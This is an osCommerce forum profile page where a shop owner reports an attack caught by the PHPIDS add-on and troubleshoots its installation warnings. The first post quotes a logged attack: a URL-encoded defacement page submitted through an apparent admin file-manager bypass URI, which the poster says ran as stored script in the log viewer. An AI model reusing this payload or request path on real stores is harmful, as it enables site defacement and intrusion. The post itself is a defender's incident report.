Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

VAZ2121

Members
  • Content count

    10
  • Joined

  • Last visited

1 Follower

About VAZ2121

  • Birthday 08/02/1964

Profile Information

  • Real Name
    Stig F.
  • Gender
    Male
  • Location
    Denmark
  1. There is a hack to the PHPIDS A hacker has written a script directly to hit this add-on. Here is the story... The PHPIDS sends me a mail about any attempt to hack the site. Today I received this: The following attack has been detected by PHPIDS IP: 78.177.107.5 Date: 2011-01-15T21:29:58+00:00 Impact: 138 Affected tags: xss csrf id rfe lfi sqli Affected parameters: REQUEST.file_contents=%3CHTML%3E+%0D%0A%3CHEAD%3E+%0D%0A+++%3CTITLE%3EHacked+By+SaMuRa%21%3C%2FTITLE%3E+%0D%0A+%3Ccenter%3E%3Cimg+src%3Dhttp%3A%2F%2Fwww.turkhackteam.net%2Fimages%2Fthtson.jpg%3E+%0D%0A+%3Cstyle%3E+%0D%0A%23legend%7Bwidth%3A+100%25%3B+position%3A+fixed%3B+background-color%3A222%3B+bottom%3A+0%3B+font-size%3A+13px%3B+left%3A+0%3B+border-top%3A%0D%0A1px+solid+white%3B+height%3A+20px%3B+padding%3A+5px%3Bcolor%3A%23gold%3Bfont-family%3Aarial%3B%7D%0D%0Aa%7Bcolor%3Awgite%3Btext-decoration%3Anone%3B%7D%0D%0Aa%3Ahover%7Bcolor%3A%23ccc%3B%7D%0D%0A%3C%2Fstyle%3E+%0D%0A+++%3Cdiv+id%3D%27legend%27%3E%3Ccenter%3E%3Cb%3ESaMuRa%21+-+Egoist+Group+-+TurkHackTeam.OrG%2FNet%3C%2Fb%3E%3C%2Fcenter%3E%3C%2Fdiv%3E+%0D%0A%3CBODY+TEXT%3D%22%239C9C9C%22+BGCOLOR%3D%22%23000000%22+LINK%3D%22%238B51FF%22+ALINK%3D%22%23FFF8FF%22%0D%0A+%3Cbody+bgcolor%3D%22%23000000%22%3E+%0D%0A++++++%3C%2Fspan%3E%3Cfont+color%3D%22White%22+size%3D%225%22%3E+%3C%2Fspan%3E%3Cfont+%0D%0A %3E%3CFONT+FACE%3D%22tahoma%22+color%3D%22%23999999%22%3E++++%0D%0A%3Ccenter%3E%3Cbr%3E%3C%2Fspan%3E%3Cspan+style%3D%22font-weight%3Abold%3B+text-shadow%3Awhite+0px+0px+8px%3B+color%3Awhite%22%3E%3Cfont+color%3Dred%3EHacked+By+SaMuRa%21+-+Black-Box+-+Dejavue+-+CaLLouS%3Cbr%3E%3C%2Ffont%3E%3C%2Fspan+%0D%0A%3E%0D%0A%3CP%3E%3CTABLE+BORDER%3D0+WIDTH%3D%22100%25%22+HEIGHT%3D%22100%25%22%3E+%0D%0A+%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%22red%22+size%3D%222%22%3E%3Cb%3E%22+Biz+eskimeyenlerdeniz%2C+Hayatta+oldugumuz+surece+her+donem+bizim+donemimiz%21+%22%0D%0A+%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cb%3E%3Cb%3E%3Cb%3E+%0D%0A%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%22white%22+size%3D%222%22%3E%3Cb%3E%3C+www.facebook.com%2Fhackingplatform+%3E%0D%0A%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%22white%22+size%3D%222%22%3E%3Cb%3E-------------------------------------------+%0D%0A+%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fb%3 E%3C%2Fcenter%3E%3Cb%3E%3Cb%3E%3Cb%3E+%0D%0A++++++++%3C%2Fb%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Fp%3E+%0D%0A%3Cbr%3E%3C%2Fspan%3E%3Cfont+color%3D%22white%22+size%3D%222%22%3C%2Ffont%3E%3Cbr%3E+, POST.file_contents=%3CHTML%3E+%0D%0A%3CHEAD%3E+%0D%0A+++%3CTITLE%3EHacked+By+SaMuRa%21%3C%2FTITLE%3E+%0D%0A+%3Ccenter%3E%3Cimg+src%3Dhttp%3A%2F%2Fwww.turkhackteam.net%2Fimages%2Fthtson.jpg%3E+%0D%0A+%3Cstyle%3E+%0D%0A%23legend%7Bwidth%3A+100%25%3B+position%3A+fixed%3B+background-color%3A222%3B+bottom%3A+0%3B+font-size%3A+13px%3B+left%3A+0%3B+border-top%3A%0D%0A1px+solid+white%3B+height%3A+20px%3B+padding%3A+5px%3Bcolor%3A%23gold%3Bfont-family%3Aarial%3B%7D%0D%0Aa%7Bcolor%3Awgite%3Btext-decoration%3Anone%3B%7D%0D%0Aa%3Ahover%7Bcolor%3A%23ccc%3B%7D%0D%0A%3C%2Fstyle%3E+%0D%0A+++%3Cdiv+id%3D%5C%27legend%5C%27%3E%3Ccenter%3E%3Cb%3ESaMuRa%21+-+Egoist+Group+-+TurkHackTeam.OrG%2FNet%3C%2Fb%3E%3C%2Fcenter%3E%3C%2Fdiv%3E+%0D%0A%3CBODY+TEXT%3D%5C%22%239C9C9C% 5C%22+BGCOLOR%3D%5C%22%23000000%5C%22+LINK%3D%5C%22%238B51FF%5C%22+ALINK%3D%5C%22%23FFF8FF%5C%22%0D%0A+%3Cbody+bgcolor%3D%5C%22%23000000%5C%22%3E+%0D%0A++++++%3C%2Fspan%3E%3Cfont+color%3D%5C%22White%5C%22+size%3D%5C%225%5C%22%3E+%3C%2Fspan%3E%3Cfont+%0D%0A%3E%3CFONT+FACE%3D%5C%22tahoma%5C%22+color%3D%5C%22%23999999%5C%22%3E++++%0D%0A%3Ccenter%3E%3Cbr%3E%3C%2Fspan%3E%3Cspan+style%3D%5C%22font-weight%3Abold%3B+text-shadow%3Awhite+0px+0px+8px%3B+color%3Awhite%5C%22%3E%3Cfont+color%3Dred%3EHacked+By+SaMuRa%21+-+Black-Box+-+Dejavue+-+CaLLouS%3Cbr%3E%3C%2Ffont%3E%3C%2Fspan+%0D%0A%3E%0D%0A%3CP%3E%3CTABLE+BORDER%3D0+WIDTH%3D%5C%22100%25%5C%22+HEIGHT%3D%5C%22100%25%5C%22%3E+%0D%0A+%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%5C%22red%5C%22+size%3D%5C%222%5C%22%3E%3Cb%3E%5C%22+Biz+eskimeyenlerdeniz%2C+Hayatta+oldugumuz+surece+her+donem+bizim+donemimiz%21+%5C%22%0D%0A+%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cb%3E%3Cb%3E%3Cb%3E+%0D%0A%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Cbr%3 E%0D%0A%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%5C%22white%5C%22+size%3D%5C%222%5C%22%3E%3Cb%3E%3C+www.facebook.com%2Fhackingplatform+%3E%0D%0A%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%5C%22white%5C%22+size%3D%5C%222%5C%22%3E%3Cb%3E-------------------------------------------+%0D%0A+%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cb%3E%3Cb%3E%3Cb%3E+%0D%0A++++++++%3C%2Fb%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Fp%3E+%0D%0A%3Cbr%3E%3C%2Fspan%3E%3Cfont+color%3D%5C%22white%5C%22+size%3D%5C%222%5C%22%3C%2Ffont%3E%3Cbr%3E+, Request URI: %2Fproduct_info.php%2Fadmin%2Ffile_manager.php%2Flogin.php%3Faction%3Dsave I receive a lot of those mails. This is however a bit different, so I decided to take a look at it. I started the Admin, and would see the PHPIDS Log. Now something happened. The code that this hacker wrote, started to execute in my Admin !!! So there is no execution-filter in viewing the Log. The hacker has used this exploit in the PHPIDS !!!!. I have checked all my files, nothing has changed. This was a mild hack, it only displayed a message in my Admin. Regards, Stig
  2. reading in "Security"

  3. OK, thanks, I will remove this line. (In your next upload to the "contributions", remove the line in the 3 files - so others don't get confused - like me :-) I have set the full path! It works fine. Everything works 100% now Thank you very much for your help. It's a great add-on (during the 4 days I have tried it, I have allready captured 2 intruders - and banned them). Thanks (again), you are doing a great job with this add-on.
  4. My Cache was turned off. I created the tmp directory (named it tmp and set permissions to 777), wrote the full path, and turned cache ON. Now I can see files begin to appear in my tmp-directory = It works. But I still get the warnings ! The problem is this command: ini_set('display_errors', '1'); I have not found this command in any other PHP-files. Are you absolutely sure you have this in your "normal" installation. It looks very much like something for debugging.
  5. The problem is solved The Add-on inculdes 3 files (admin/banned_ip.php and admin/phpids_installer.php and admin/phpids_report.php) All 3 files has some error-reporting turned on. Take a look at this: <?php /* $Id: phpids_installer.php PHP Intrusion Detection System for osCommerce PHPIDS for osCommerce 1.6 Date: June 13, 2010 Created by celextel - www.celextel.com Module to include PHPIDS into osCommerce to log and prevent intrusions osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2010 osCommerce Released under the GNU General Public License */ error_reporting(E_ALL); ini_set('display_errors', '1'); require_once('includes/application_top.php'); // create phpids table if it does not exist mysql_query("DESC ". TABLE_PHPIDS .""); if (mysql_errno()) { mysql_query("CREATE TABLE IF NOT EXISTS ". TABLE_PHPIDS ." ( ..... The first 2 commands are error_reporting(E_ALL); ini_set('display_errors', '1'); I removed those 2 commands from the 2 files in my admin/ and now there are no more warnings. As you also can see, the following command mysql_query("DESC ". TABLE_PHPIDS .""); will generate an error (if the table is not present in the db) hence giving me an error/warning massages when executing. Are any of the 2 commands needed ?, or may I just delete them both ?
  6. 1. I did run the admin/phpids_installer.php. That file also gave the same warnings, but it also gave me the success-messages that the tables were created. 2. I have just re-checked the following: The Banned IP I tried to insert does get inserted (inspite of all the warnings). I just had to re-load the page to see the results ! It works OK. Afterall, it's just "warnings", the code seems to work as it should. 3. I will later check the 2 MySQL-tables, to see if they are not exactly created as the phpids_installer.php told them to be. So now it's not so critical. It would be nice to see my admin running without warnings.
  7. Hi I have just installed this Add-On. In Admin I select Tools, Banned IP. Then this is written on top of the page: Warning: session_save_path() [function.session-save-path]: open_basedir restriction in effect. File(/tmp) is not within the allowed path(s): (/customers/mysite.com/mysite.com:/var/www/diagnostics:/usr/share/php) in /customers/mysite.com/mysite.com/httpd.www/admin/includes/functions/sessions.php on line 165 Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /customers/mysite.com/mysite.com/httpd.www/admin/includes/functions/sessions.php:165) in /customers/mysite.com/mysite.com/httpd.www/admin/includes/functions/sessions.php on line 102 I am also not able to Insert (Ban) an IP (a lot of warnings appear) The same warnings appear when i select the meny PHPIDS Log. This meny does work OK though. Any ideas ?.
  8. Sorry wrong post
×